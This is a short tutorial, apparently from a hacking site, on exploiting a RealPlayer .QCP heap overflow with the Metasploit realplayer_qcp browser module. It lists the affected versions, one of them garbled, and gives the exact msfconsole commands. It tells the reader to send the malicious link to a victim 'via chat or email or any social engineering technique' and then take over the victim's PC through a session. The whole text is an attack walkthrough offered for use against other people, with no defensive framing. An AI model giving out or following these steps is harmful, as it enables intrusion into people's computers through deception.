This module exploits a heap overflow in Real player when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.
RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5
Internet Explorer 7.0.5730.13
Apple RealPlayer 220.127.116.113
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/realplayer_qcp
Msf exploit (realplayer_qcp)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (realplayer_qcp)>set uripath realplayer (The Url to use for this exploit)
Msf exploit (realplayer_qcp)>exploit
Now an URL you should give to your victim //192.168.1.4:8080/realplayer
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“